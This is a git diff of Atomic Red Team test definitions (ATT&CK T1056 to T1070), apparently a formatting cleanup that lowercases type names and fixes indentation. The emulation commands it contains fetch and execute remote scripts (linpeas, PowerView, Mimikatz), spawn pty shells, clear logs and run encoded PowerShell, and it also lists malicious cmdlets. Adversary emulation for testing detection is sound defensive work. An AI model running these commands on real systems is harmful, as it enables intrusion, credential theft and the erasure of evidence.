PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift + description: Location of swift script + type: path + default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift dependency_executor_name: bash dependencies: - - description: | - swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. - prereq_command: | - if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi - get_prereq_command: | - echo "" + - description: | + swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions. + prereq_command: | + if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi + get_prereq_command: | + echo "" executor: command: | swift #{swift_src} -keylog diff --git a/atomics/T1056.004/T1056.004.yaml b/atomics/T1056.004/T1056.004.yaml index f94bb743..f72c49cd 100644 --- a/atomics/T1056.004/T1056.004.yaml +++ b/atomics/T1056.004/T1056.004.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: file_name: description: Dll To Inject - type: Path + type: path default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll server_name: description: TLS Server To Test Get Request - type: Url + type: url default: https://www.example.com dependency_executor_name: powershell dependencies: diff --git a/atomics/T1057/T1057.yaml b/atomics/T1057/T1057.yaml index e3939596..c41b088a 100644 --- a/atomics/T1057/T1057.yaml +++ b/atomics/T1057/T1057.yaml @@ -69,4 +69,4 @@ atomic_tests: executor: command: | wmic process get /format:list - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 9b52b7bc..289d982d 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: mimurl: description: Mimikatz url - type: Url + type: url default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 executor: command: | @@ -28,7 +28,7 @@ atomic_tests: input_arguments: file_path: description: File path for SharpHound payload - type: String + type: string default: PathToAtomicsFolder\T1059.001\src dependency_executor_name: powershell dependencies: @@ -110,7 +110,7 @@ atomic_tests: input_arguments: url: description: url of payload to execute - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1 executor: command: | @@ -127,7 +127,7 @@ atomic_tests: input_arguments: url: description: url of payload to execute - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml executor: command: | @@ -144,7 +144,7 @@ atomic_tests: input_arguments: url: description: url of payload to execute - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct executor: command: | @@ -206,7 +206,7 @@ atomic_tests: input_arguments: ads_file: description: File created to store Alternate Stream Data - type: String + type: string default: $env:TEMP\NTFS_ADS.txt dependencies: - description: | @@ -229,19 +229,19 @@ atomic_tests: description: | Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. - + supported_platforms: - - windows + - windows input_arguments: hostname_to_connect: description: The host to connect to, by default it will connect to the local machine - type: String + type: string default: $env:COMPUTERNAME dependencies: - description: | - PSRemoting must be enabled + PSRemoting must be enabled prereq_command: | Try { New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null @@ -271,11 +271,11 @@ atomic_tests: input_arguments: command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen command_param_variation: description: The "Command" parameter variation to use - type: String + type: string default: C dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -297,15 +297,15 @@ atomic_tests: input_arguments: command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen command_param_variation: description: The "Command" parameter variation to use - type: String + type: string default: C encoded_arguments_param_variation: description: The "EncodedArguments" parameter variation to use - type: String + type: string default: EA dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -327,11 +327,11 @@ atomic_tests: input_arguments: command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen encoded_command_param_variation: description: The "EncodedCommand" parameter variation to use - type: String + type: string default: E dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -353,15 +353,15 @@ atomic_tests: input_arguments: encoded_command_param_variation: description: The "EncodedCommand" parameter variation to use - type: String + type: string default: E command_line_switch_type: description: The type of supported command-line switch to use - type: String + type: string default: Hyphen encoded_arguments_param_variation: description: The "EncodedArguments" parameter variation to use - type: String + type: string default: EncodedArguments dependencies: - description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module. @@ -384,7 +384,7 @@ atomic_tests: input_arguments: obfuscated_code: description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' - type: String + type: string default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== executor: command: | @@ -398,8 +398,8 @@ atomic_tests: - windows input_arguments: Malicious_cmdlets: - description: Known Malicious Cmdlets - type: String + description: Known Malicious Cmdlets + type: string default: | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" executor: @@ -440,4 +440,3 @@ atomic_tests: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell - diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 6f77e098..d49f7394 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: command_to_execute: description: Command to execute within script. - type: String + type: string default: dir script_path: description: Script path. - type: Path + type: path default: $env:TEMP\T1059.003_script.bat dependency_executor_name: powershell dependencies: @@ -40,11 +40,11 @@ atomic_tests: input_arguments: file_contents_path: description: Path to the file that the command prompt will drop. - type: Path + type: path default: '%TEMP%\test.bin' message: description: Message that will be written to disk and then displayed. - type: String + type: string default: 'Hello from the Windows Command Prompt!' executor: command: | @@ -61,11 +61,11 @@ atomic_tests: input_arguments: output_file: description: File to output to - type: String + type: string default: hello.txt input_message: description: Message to write to file - type: String + type: string default: Hello, from CMD! executor: command: | @@ -82,11 +82,11 @@ atomic_tests: input_arguments: file_to_print: description: File to be opened/printed by Wordpad. - type: String + type: string default: $env:temp\T1059_003note.txt max_to_print: description: The maximum number of Wordpad windows the test will open/print. - type: String + type: string default: 75 dependency_executor_name: powershell dependencies: @@ -113,7 +113,7 @@ atomic_tests: input_arguments: input_file: description: CMD file that is read by Command Prompt and execute, which launches calc.exe - type: Path + type: path default: PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd dependency_executor_name: powershell dependencies: @@ -128,4 +128,4 @@ atomic_tests: command: | cmd /r cmd<#{input_file} name: command_prompt - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml index dbd5bae4..d567ca1d 100644 --- a/atomics/T1059.004/T1059.004.yaml +++ b/atomics/T1059.004/T1059.004.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: script_path: description: Script path - type: Path + type: path default: /tmp/art.sh executor: command: | @@ -43,15 +43,15 @@ atomic_tests: description: | AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. supported_platforms: - - linux + - linux input_arguments: autosuid: description: Path to the autosuid shell script - type: Path + type: path default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh autosuid_url: description: Path to download autosuid shell script - type: Url + type: url default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh dependency_executor_name: bash dependencies: @@ -73,15 +73,15 @@ atomic_tests: description: | LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host. supported_platforms: - - linux + - linux input_arguments: linenum: description: Path to the LinEnum shell script - type: Path + type: path default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh linenum_url: description: Path to download LinEnum shell script - type: Url + type: url default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh dependency_executor_name: bash dependencies: diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index 283e87dd..5073a174 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml @@ -5,14 +5,14 @@ atomic_tests: auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 description: |- Visual Basic execution test, execute vbscript via PowerShell. - + When successful, system information will be written to $env:TEMP\T1059.005.out.txt. supported_platforms: - windows input_arguments: vbscript: description: Path to sample script - type: String + type: string default: PathToAtomicsFolder\T1059.005\src\sys_info.vbs dependency_executor_name: powershell dependencies: @@ -70,7 +70,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index cc67c697..5a087865 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml @@ -1,172 +1,172 @@ attack_technique: T1059.006 display_name: 'Command and Scripting Interpreter: Python' -atomic_tests: - - name: Execute shell script via python's command mode arguement - auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb - description: Download and execute shell script and write to file then execute locally using Python -c (command mode) - supported_platforms: - - linux - input_arguments: - script_url: - description: Shell script public URL - type: String - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Name of shell script downloaded from the script_url - type: String - default: T1059.006-payload - executor: - description: Linux shell - type: String - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. - type: String - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - dependency_executor_name: sh - dependencies: - - description: Verify if python is in the environment variable path and attempt to import requests library. - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' - name: sh - cleanup_command: | - rm #{payload_file_name} - - name: 'Execute Python via scripts (Linux)' - auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 - description: Create Python file (.py) that downloads and executes shell script via executor arguments - supported_platforms: - - linux - input_arguments: - python_script_name: - description: Python script name - type: Path - default: T1059.006.py - script_url: - description: Shell script public URL - type: String - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Shell script file name downloaded from the script_url - type: String - default: T1059.006-payload - executor: - description: Payload or script interpreter / executor - type: String - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files - type: String - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - dependency_executor_name: sh - dependencies: - - description: | - Requires Python - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - echo 'import requests' > #{python_script_name} - echo 'import os' >> #{python_script_name} - echo 'url = "#{script_url}"' >> #{python_script_name} - echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} - echo 'session = requests.session()' >> #{python_script_name} - echo 'source = session.get(url).content' >> #{python_script_name} - echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} - echo 'fd.write(source)' >> #{python_script_name} - echo 'fd.close()' >> #{python_script_name} - echo 'os.system(malicious_command)' >> #{python_script_name} - $which_python #{python_script_name} - name: sh - cleanup_command: | - rm #{python_script_name} #{payload_file_name} - - name: 'Execute Python via Python executables (Linux)' - auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa - description: | - Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments - supported_platforms: - - linux - input_arguments: - python_script_name: - description: Name of Python script name - type: Path - default: T1059.006.py - script_url: - description: URL hosting external malicious payload - type: String - default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh - payload_file_name: - description: Shell script file name downloaded from the script_url - type: String - default: T1059.006-payload - executor: - description: Payload or script interpreter / executor - type: String - default: sh - script_args: - description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files - type: String - default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles - python_binary_name: - description: Name of Python file to be compiled - type: Path - default: T1059.006.pyc - dependency_executor_name: sh - dependencies: - - description: | - Requires Python - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests - executor: - command: | - which_python=$(which python || which python3 || which python2) - echo 'import requests' > #{python_script_name} - echo 'import os' >> #{python_script_name} - echo 'url = "#{script_url}"' >> #{python_script_name} - echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} - echo 'session = requests.session()' >> #{python_script_name} - echo 'source = session.get(url).content' >> #{python_script_name} - echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} - echo 'fd.write(source)' >> #{python_script_name} - echo 'fd.close()' >> #{python_script_name} - echo 'os.system(malicious_command)' >> #{python_script_name} - $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")' - $which_python #{python_binary_name} - name: sh - cleanup_command: | - rm #{python_binary_name} #{python_script_name} #{payload_file_name} - - name: 'Python pty module and spawn function used to spawn sh or bash' - auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792 - description: | - Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence - supported_platforms: - - linux - dependencies: - - description: | - Verify if python is in the environment variable path and attempt to import requests library. - prereq_command: | - which_python=$(which python || which python3 || which python2); $which_python -V - $which_python -c 'import requests' 2>/dev/null; echo $? - get_prereq_command: | - pip install requests +atomic_tests: +- name: Execute shell script via python's command mode arguement + auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + description: Download and execute shell script and write to file then execute locally using Python -c (command mode) + supported_platforms: + - linux + input_arguments: + script_url: + description: Shell script public URL + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Name of shell script downloaded from the script_url + type: string + default: T1059.006-payload executor: - command: |- - which_python=$(which python || which python3 || which python2) - $which_python -c "import pty;pty.spawn('/bin/sh')" - exit - $which_python -c "import pty;pty.spawn('/bin/bash')" - exit - name: bash + description: Linux shell + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + dependency_executor_name: sh + dependencies: + - description: Verify if python is in the environment variable path and attempt to import requests library. + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' + name: sh + cleanup_command: | + rm #{payload_file_name} +- name: 'Execute Python via scripts (Linux)' + auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + description: Create Python file (.py) that downloads and executes shell script via executor arguments + supported_platforms: + - linux + input_arguments: + python_script_name: + description: Python script name + type: path + default: T1059.006.py + script_url: + description: Shell script public URL + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Shell script file name downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Payload or script interpreter / executor + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + dependency_executor_name: sh + dependencies: + - description: | + Requires Python + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + echo 'import requests' > #{python_script_name} + echo 'import os' >> #{python_script_name} + echo 'url = "#{script_url}"' >> #{python_script_name} + echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} + echo 'session = requests.session()' >> #{python_script_name} + echo 'source = session.get(url).content' >> #{python_script_name} + echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} + echo 'fd.write(source)' >> #{python_script_name} + echo 'fd.close()' >> #{python_script_name} + echo 'os.system(malicious_command)' >> #{python_script_name} + $which_python #{python_script_name} + name: sh + cleanup_command: | + rm #{python_script_name} #{payload_file_name} +- name: 'Execute Python via Python executables (Linux)' + auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + description: | + Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments + supported_platforms: + - linux + input_arguments: + python_script_name: + description: Name of Python script name + type: path + default: T1059.006.py + script_url: + description: URL hosting external malicious payload + type: string + default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh + payload_file_name: + description: Shell script file name downloaded from the script_url + type: string + default: T1059.006-payload + executor: + description: Payload or script interpreter / executor + type: string + default: sh + script_args: + description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files + type: string + default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles + python_binary_name: + description: Name of Python file to be compiled + type: path + default: T1059.006.pyc + dependency_executor_name: sh + dependencies: + - description: | + Requires Python + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + echo 'import requests' > #{python_script_name} + echo 'import os' >> #{python_script_name} + echo 'url = "#{script_url}"' >> #{python_script_name} + echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} + echo 'session = requests.session()' >> #{python_script_name} + echo 'source = session.get(url).content' >> #{python_script_name} + echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} + echo 'fd.write(source)' >> #{python_script_name} + echo 'fd.close()' >> #{python_script_name} + echo 'os.system(malicious_command)' >> #{python_script_name} + $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")' + $which_python #{python_binary_name} + name: sh + cleanup_command: | + rm #{python_binary_name} #{python_script_name} #{payload_file_name} +- name: 'Python pty module and spawn function used to spawn sh or bash' + auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792 + description: | + Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence + supported_platforms: + - linux + dependencies: + - description: | + Verify if python is in the environment variable path and attempt to import requests library. + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: |- + which_python=$(which python || which python3 || which python2) + $which_python -c "import pty;pty.spawn('/bin/sh')" + exit + $which_python -c "import pty;pty.spawn('/bin/bash')" + exit + name: bash diff --git a/atomics/T1059.007/T1059.007.yaml b/atomics/T1059.007/T1059.007.yaml index 989dd501..76befeaa 100644 --- a/atomics/T1059.007/T1059.007.yaml +++ b/atomics/T1059.007/T1059.007.yaml @@ -1,44 +1,44 @@ attack_technique: T1059.007 display_name: "Command and Scripting Interpreter: JavaScript" atomic_tests: - - name: JScript execution to gather local computer information via cscript - auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 - description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt - supported_platforms: - - windows - input_arguments: - jscript: - description: Path to sample script - type: string - default: PathToAtomicsFolder\T1059.007\src\sys_info.js - dependency_executor_name: powershell - dependencies: - - description: Sample script must exist on disk at specified location (#{jscript}) - prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " - get_prereq_command: |- - New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" - executor: - command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'" - cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore - name: command_prompt - - name: JScript execution to gather local computer information via wscript - auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484 - description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes. - supported_platforms: - - windows - input_arguments: - jscript: - description: Path to sample script - type: string - default: PathToAtomicsFolder\T1059.007\src\sys_info.js - dependency_executor_name: powershell - dependencies: - - description: Sample script must exist on disk at specified location (#{jscript}) - prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " - get_prereq_command: |- - New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" - executor: - command: "wscript #{jscript}" - name: command_prompt +- name: JScript execution to gather local computer information via cscript + auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 + description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt + supported_platforms: + - windows + input_arguments: + jscript: + description: Path to sample script + type: string + default: PathToAtomicsFolder\T1059.007\src\sys_info.js + dependency_executor_name: powershell + dependencies: + - description: Sample script must exist on disk at specified location (#{jscript}) + prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " + get_prereq_command: |- + New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" + executor: + command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'" + cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore + name: command_prompt +- name: JScript execution to gather local computer information via wscript + auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484 + description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes. + supported_platforms: + - windows + input_arguments: + jscript: + description: Path to sample script + type: string + default: PathToAtomicsFolder\T1059.007\src\sys_info.js + dependency_executor_name: powershell + dependencies: + - description: Sample script must exist on disk at specified location (#{jscript}) + prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " + get_prereq_command: |- + New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" + executor: + command: "wscript #{jscript}" + name: command_prompt diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index ca4b2d31..13d6c9ce 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -25,7 +25,7 @@ atomic_tests: input_arguments: user: description: User to identify what groups a user is a member of - type: String + type: string default: administrator executor: command: | @@ -76,10 +76,10 @@ atomic_tests: input_arguments: computer_name: description: hostname of the computer to analyze - type: Path + type: path default: $env:COMPUTERNAME executor: - command: | + command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell @@ -88,7 +88,7 @@ atomic_tests: description: | When successful, accounts that do not require kerberos pre-auth will be returned supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | @@ -110,7 +110,7 @@ atomic_tests: get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -118,7 +118,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -164,7 +164,7 @@ atomic_tests: When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | @@ -194,7 +194,7 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" - name: powershell + name: powershell - name: Get-DomainGroup with PowerView auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230 description: | @@ -205,4 +205,4 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose - name: powershell + name: powershell diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index fdd29975..c7ff9bfe 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: log_name: description: Windows Log Name, ex System - type: String + type: string default: System executor: command: | diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index b1284938..a1561ada 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -23,7 +23,7 @@ atomic_tests: input_arguments: username: description: Username of mail spool - type: String + type: string default: root executor: command: | @@ -38,9 +38,9 @@ atomic_tests: input_arguments: log_path: description: Path of specified log - type: Path + type: path default: /var/log/secure executor: command: | echo 0> #{log_path} - name: bash \ No newline at end of file + name: bash diff --git a/atomics/T1070.004/T1070.004.yaml b/atomics/T1070.004/T1070.004.yaml index c6b1aa9b..179b467b 100644 --- a/atomics/T1070.004/T1070.004.yaml +++ b/atomics/T1070.004/T1070.004.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: file_to_delete: description: Path of file to delete - type: Path + type: path default: /tmp/victim-files/a executor: command: | @@ -27,7 +27,7 @@ atomic_tests: input_arguments: folder_to_delete: description: Path of folder to delete - type: Path + type: path default: /tmp/victim-files executor: command: | @@ -42,7 +42,7 @@ atomic_tests: input_arguments: file_to_shred: description: Path of file to shred - type: Path + type: path default: /tmp/victim-shred.txt executor: command: | @@ -57,8 +57,9 @@ atomic_tests: - windows input_arguments: file_to_delete: - description: File to delete. Run the prereq command to create it if it does not exist. - type: String + description: File to delete. Run the prereq command to create it if it does + not exist. + type: string default: '%temp%\deleteme_T1551.004' dependency_executor_name: command_prompt dependencies: @@ 